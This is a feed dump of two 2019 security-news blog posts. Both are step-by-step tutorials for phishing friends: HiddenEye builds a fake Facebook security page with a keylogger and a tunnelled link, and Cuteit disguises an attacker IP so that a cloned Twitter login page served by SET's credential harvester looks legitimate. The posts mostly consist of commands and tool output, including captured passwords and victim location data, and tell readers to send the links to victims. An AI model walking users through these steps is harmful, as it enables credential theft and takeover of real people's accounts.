Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ Information Security Newspaper|Infosec Articles|Hacking News Fri, 02 Aug 2019 15:29:32 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.4 https://www.securitynewspaper.com/snews-up/2018/12/news5.png Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ 32 32 Hack your friends Facebook account using HiddenEye https://www.securitynewspaper.com/2019/08/02/hack-your-friends-facebook-account-using-hiddeneye/ Fri, 02 Aug 2019 15:16:49 +0000 https://www.securitynewspaper.com/?p=16381 Phishing is what mostly victims fall into trap of fake pages. There are many of methods for creating fake pages. Phishing is an way to obtain login credentials such asRead More →

The post Hack your friends Facebook account using HiddenEye appeared first on Information Security Newspaper | Hacking News.

]]>
Phishing is what mostly victims fall into trap of fake pages. There are many of methods for creating fake pages. Phishing is an way to obtain login credentials such as usernames & passwords or confidential details by creating cloned pages of original web pages. According to ethical hacking researcher of international institute of cyber security most of the attacks are done using phishing techniques.

Even phishing is still most popular cyber attack used by many attackers/ spammers. We will show python script written in python. Modern phishing tool is used phishing tool which gives wide variety of social networks.

  • For testing we will use Ubuntu 16.04.3 LTS 64 Bit. Install python3, php7, wget. For that type sudo apt-get update && sudo apt-get install python3, sudo apt-get install python-pip3, sudo apt-get install wget.
  • After installing above requirements. Type git clone https://github.com/DarkSecDevelopers/HiddenEye.git
  • Then type cd HiddenEye && ls
  • Type pip3 install -r requirements.txt
  • Type python3 HiddenEye.py
  • Type y
HURRAY!! Internet is available.. We can Continue
 PHP INSTALLATION FOUND
 [*] HiddenEye is Opening. Please Wait…100%
 [!] Do you agree to use this tool for educational purposes only? (y/n)
 HiddenEye >>> y
  • Type 1

  ██   ██ ██ ██████   ██████   ███████ ███   ██  ███████ ██    ██ ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ████  ██  ██       ██  ██  ██
  ███████ ██ ██    ██ ██    ██ ███████ ██ ██ ██  ███████   ████   ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ██  ████  ██         ██    ██
  ██   ██ ██ ██████   ██████   ███████ ██   ███  ███████    ██    ███████

                                                     v0.2.7 BY:DARKSEC
             [ Modern Phishing Tool With Advanced Functionality ]
[ PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------
SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:
------------------------
 [1] Facebook        [10] Yahoo          [19] Pinterest      [28] DropBox
 [2] Google          [11] Twitch         [20] ProtonMail     [29] eBay
 [3] LinkedIn        [12] Microsoft      [21] Spotify        [30] MySpace
 [4] GitHub          [13] Steam          [22] Quora          [31] PayPal
 [5] StackOverflow   [14] VK             [23] PornHub        [32] Shopify
 [6] WordPress       [15] iCloud         [24] Adobe          [33] Verizon
 [7] Twitter         [16] GitLab         [25] Badoo          [34] Yandex
 [8] Instagram       [17] Netflix        [26] CryptoCurrency [35] Reddit
 [9] Snapchat        [18] Origin         [27] DevianArt
HiddenEye >>>
  • Type 3
 [*] SELECT ANY ONE MODE…
 Operation mode:
  [1] Standard Page Phishing
  [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
  [3] Facebook Phishing- Fake Security issue(security_mode)
  [4] Facebook Phising-Messenger Credentials(messenger_mode)
 HiddenEye >>> 3
  • Type Y
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY: DARKSEC **
-------------------------------
[ KEYLOGGER PROMPT ]!!
-------------------------------
[*]DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-(Y/N)
 YOUR CHOICE >>> Y
  • Type www.facebook.com
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY:DARKSEC **

-------------------------------
[ PUT YOUR REDIRECTING URL HERE ]
-------------------------------
**(Choose Wisely As Your Victim Will Redirect to This Link)

**(Do not leave it blank. Unless Errors may occur)

[*]Insert a custom redirect url:

REDIRECT HERE>>> www.facebook.com
  • Type 443
[ WEBSERVER PORT SELECTION ]!!
 [*]Select Any Available Port [1-65535]:
 HiddenEye >>> 443
  • Type 2
[ HOST SERVER SELECTION ]!!
[!](SERVEO WORKS BETTER)
[*]Select Any Available Server:
[1]Ngrok
[2]Serveo
 HiddenEye >>> 2
  • Type 2
[ SERVEO URL TYPE SELECTION ]!!
 [!]REMEMBER ? Serveo Don't Allows Phishing.
 [!]They Drops The Connection Whenever Detects Phishing.
 [*]CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK:
 [1]Custom URL (Generates designed url)
 [2]Random URL (Generates Random url)
 YOUR CHOICE >>> 2

 [ RANDOM SERVEO URL ]!!
 [!] SEND THIS SERVEO URL TO VICTIMS-
 [] Localhost URL: https://127.0.0.1:443 
 [] SERVEO URL: https://viduo.serveo.net
 ……………………………………………………………….
 [!] IF FOUND SEGMENTATION FAULT, IT MEANS THE SERVER FAILED.            |
 [!] THEN YOU HAVE TO RUN IT AGAIN.                                      |
 [!] Use This Command In Another Terminal.                               |
 (cd Server/www/ && php -S 127.0.0.1:443 > /dev/null)                   |
 ……………………………………………………………….
 [*] Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim …
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  • Open another temrinal & go to below location cd /home/iicybersecurity/HiddenEye/ Server/www/ && php -S 127.0.0.1:443 > /dev/null
root@ubuntu:/home/iicybersecurity/HiddenEye# cd Server/www/ && php -S 127.0.0.1:443 > /dev/null
[Fri Aug 2 03:55:35 2019] 127.0.0.1:37156 [200]: /keylogger.php?c=
[Fri Aug 2 03:55:36 2019] 127.0.0.1:37158 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:37 2019] 127.0.0.1:37160 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:38 2019] 127.0.0.1:37162 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:39 2019] 127.0.0.1:37164 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:40 2019] 127.0.0.1:37166 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:41 2019] 127.0.0.1:37168 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:42 2019] 127.0.0.1:37170 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:43 2019] 127.0.0.1:37172 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:44 2019] 127.0.0.1:37174 [200]: /keylogger.php?c= 
  • As you will open https://127.0.0.1:443 in your web browser. You will see victim interaction where you have started server.
  • Enter username & password.
  • For sending fake page to your friends you can send fake email to your friends using public URL generated, in this case it is https://viduo.seveo.net. You can send https://viduo.seveo.net & you can also check using your loopback URL for testing on Ubuntu machine, https://127/0/0/1:443
https://viduo.seveo.ne
https://127/0/0/1:443
  • After entering username & password. You will found login credentials in terminal where you have started HiddenEye.py
…………………………………………………………
  [ CREDENTIALS FOUND ]:
 …………………………………………………………
[EMAIL]; meetmichael@gmail.com [PASS]: michael@12345
 …………………………………………………………
 [ VICTIM INFO FOUND ]:
  Victim Public IP: 220.59.157.158
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
 Current logged in user: root
 Longitude: 79.0005 
 Latitude: 22.6000
 ISP: AS17813 
 Country: IN
 Region: Delhi 
 City: Delhi
 …………………………………………………………
 ………………………….
 ………………………….

The post Hack your friends Facebook account using HiddenEye appeared first on Information Security Newspaper | Hacking News.

]]>
Convert any Malicious IP Into URL to HACK YOUR FRIEND https://www.securitynewspaper.com/2019/05/01/convert-any-malicious-ip-into-url-to-hack-your-friend/ Thu, 02 May 2019 02:46:52 +0000 https://www.securitynewspaper.com/?p=14227 Phishing attacks are very common these days. Most large companies face phishing attacks. International Institute of Cyber Security ethical hacking course includes many methods, where attacking or scripting methods areRead More →

The post Convert any Malicious IP Into URL to HACK YOUR FRIEND appeared first on Information Security Newspaper | Hacking News.

]]>
Phishing attacks are very common these days. Most large companies face phishing attacks. International Institute of Cyber Security ethical hacking course includes many methods, where attacking or scripting methods are used to hack any company. But phishing is most reliable and easy. And this method still is very useful. Today we are talking about a tool called cuteit.

Ethical hacking researcher of international institute of cyber security says that cuteit is a well designed tool to hide malicious IP. This tool can be used in network pentesting.

Cuteit is design to make malicious IP addresses into regular URLs. A simple python script which helps attacker to make malicious IP look like regular IP. This tool makes IP into many forms. For showing, we have tesed this tool on Kali Linux 2018.4

  • For cloning type git clone https://github.com/D4Vinci/Cuteit.git
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/D4Vinci/Cuteit.git
Cloning into 'Cuteit'…
remote: Enumerating objects: 17, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 41 (delta 7), reused 13 (delta 5), pack-reused 24
Unpacking objects: 100% (41/41), done.
  • Then type cd Cuteit && ls
root@kali:/home/iicybersecurity/Downloads# cd Cuteit/
root@kali:/home/iicybersecurity/Downloads/Cuteit# ls
Cuteit.py LICENSE module.png README.md Screenshot1.png Screenshot2.png
  • Type python Cuteit.py
root@kali:/home/iicybersecurity/Downloads/Cuteit# python Cuteit.py
usage: Cuteit.py [-h] [--disable-coloring] ip
Cuteit.py: error: too few arguments
  • Then type python cuteit.py
root@kali:/home/iicybersecurity/Downloads/Cuteit# python Cuteit.py -h
usage: Cuteit.py [-h] [--disable-coloring] ip


positional arguments:
ip IP you want to convert

optional arguments:
-h, --help show this help message and exit
--disable-coloring Disable colored printing
  • Type python Cuteit.py 192.168.1.8
  • 192.168.1.8 is your local IP/ attacker IP.
root@kali:/home/iicybersecurity/Downloads/Cuteit# python Cuteit.py 192.168.1.8
Cuteit IP obfuscator made with ❤ By Karim 'D4Vinci' Shoair
Converting IP to HEX
* Using https://0xc0.168.1.8 form
[0] https://howsecureismypassword.net@0xc0.168.1.8
[1] https://google.com@accounts@0xc0.168.1.8
[2]https://www.facebook.com+settings&tab=privacy@0xc0.168.1.8

* Using https://0xc0.0xa8.1.8 form
[0] https://howsecureismypassword.net@0xc0.0xa8.1.8
[1] https://google.com@accounts@0xc0.0xa8.1.8
[2] https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.1.8

* Using https://0xc0.0xa8.0x1.8 form
[0] https://howsecureismypassword.net@0xc0.0xa8.0x1.8
[1] https://google.com@accounts@0xc0.0xa8.0x1.8
[2] https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.0x1.8

* Using https://0xc0.0xa8.0x1.0x8 form
[0] https://howsecureismypassword.net@0xc0.0xa8.0x1.0x8
[1] https://google.com@accounts@0xc0.0xa8.0x1.0x8
[2]https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.0x1.0x8

* Using https://0x00000000c0.0x000000a8.0x00001.0x008 form [0] https://howsecureismypassword.net@0x00000000c0.0x000000a8.0x00001.0x008
[1] https://google.com@accounts@0x00000000c0.0x000000a8.0x00001.0x008 [2] https://www.facebook.com+settings&tab=privacy@0x00000000c0.0x000000a8.0x00001.0x008

* Using https://0xc0a80108 form
[0] https://howsecureismypassword.net@0xc0a80108
[1] https://google.com@accounts@0xc0a80108
[2] https://www.facebook.com+settings&tab=privacy@0xc0a80108

Converting IP to Octal
* Using https://0300.0250.0001.0010 form
[0] https://howsecureismypassword.net@0300.0250.0001.0010
[1] https://google.com@accounts@0300.0250.0001.0010
[2] https://www.facebook.com+settings&tab=privacy@0300.0250.0001.0010

Converting IP to Long
* Using https://3232235784 form
[0] https://howsecureismypassword.net@3232235784
[1] https://google.com@accounts@3232235784
[2] https://www.facebook.com+settings&tab=privacy@3232235784

Converting IP to urlencoded IP
* Using https://%3192%2E%3168%2E%31%2E%38 form
[0] https://howsecureismypassword.net@%3192%2E%3168%2E%31%2E%38
[1] https://google.com@accounts@%3192%2E%3168%2E%31%2E%38
[2] https://www.facebook.com+settings&tab=privacy@%3192%2E%3168%2E%31%2E%38
  • After executing above query a list of regular URLs will be created. Now you can send these URLs to your victim.
  • You can also use these URls in creating an fake page. As ethical hacking instructor of International Institute of Cyber Security explains in class on how we can use Kali Linux inbuilt toolkit to create phishing pages.
  • Open another Linux terminal for creating phishing page. Type sectookit
root@kali:/home/iicybersecurity# setoolkit

Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

  • Type 1
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

set> 1
  • Type 2
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
  • Type 5
set:webattack>5
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
  • Type 2
set:webattack>2

--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---
The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
important:
If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.
  • Type 192.168.1.8
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.8]:192.168.1.8
  • Type twitter.com/login
set:webattack> Enter the url to clone:twitter.com/login
[] Cloning the website: https://twitter.com/login [] This could take a little bit…


The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[] You may need to copy /var/www/ into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[] Web Jacking Attack Vector is Enabled…Victim needs to click the link. [] The Social-Engineer Toolkit Credential Harvester Attack
[] Credential Harvester is running on port 80 [] Information will be displayed to you as it arrives below:
  • As target opens any URL from above list where Cuteit has created many URls.
  • Go to web browser and open https://google.com@accounts@0xc0.168.1.8
  • As you open above link it will open another link. That phishing link will be used.
  • As your target opens above marked link. Information will be displayed in terminal where you have created the phishing page.
192.168.1.2 - - [11/Feb/2019 01:54:46] "GET / HTTP/1.1" 200 -
directory traversal attempt detected from: 192.168.1.2
  • Now if the target enters username and password. It will display in Linux terminal.
192.168.1.2 - - [11/Feb/2019 01:54:59] "GET /index.html HTTP/1.1" 404 -

[] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: session[username_or_email]=veho43166188
POSSIBLE PASSWORD FIELD FOUND: session[password]=testpass123@

PARAM: authenticity_token=ccfecb5221b3f2dfca275505ccc3fd824ac1ff2e PARAM: ui_metrics={"rf":{"a1fc4712673653dc721140c307b3d69bdf1debba19c11a88f047db3675dd013a":-234,"c74278047b48f1012b45b502858bd8416981f37a62e06d7b1a3b7fb029960145":99,"ece868d7ddab4e90b3b79cdef3f463c1edb1af8d9043aff0889136eff50b2a7a":-82,"ae942ff2a53c3475e676e8d6655e26999352ea85d97c4841e2f20cd2b810708d":-210},"s":"5sb3j3j2yR5o0-h0Q_ky-89k40N0EuZ7v7g4aEUCr5KyHp3tVmkracFE845oc-23ta2rQScujGno8eT-6iLLoiCiZz4DMKl65Q_cVhMPckCAQ6vdwu-iMWgphwtX5JSVWdLxI9kookHzpv3t22keXhnGrDeT2GLRPqVQBaTY0QO_zEyewzMmwjMIqyYGZWFV666gf94T0-rs4EGp-PhcMw_w23eQ2FEUKEMTaqJOF0u2wjOq4MacNxIoVas_UUPZKoiGqNhN5AWl0YpAXE6G-v6o80sQbZikdSz4062qvAl65WCE6CGDssXmqlDajIy9rpNy4WwNIHO5zxZBOR1wAAAWjbVmnh"}
PARAM: scribe_log=
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=
PARAM: authenticity_token=ccfecb5221b3f2dfca275505ccc3fd824ac1ff2e
PARAM: remember_me=1
[
] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
  • As you can see, you an easily grab the username and password.

If normal phishing pages are created. There are very less chance that target will open that page. This tool helps as it create malicious IP into regular URLs.

The post Convert any Malicious IP Into URL to HACK YOUR FRIEND appeared first on Information Security Newspaper | Hacking News.

]]>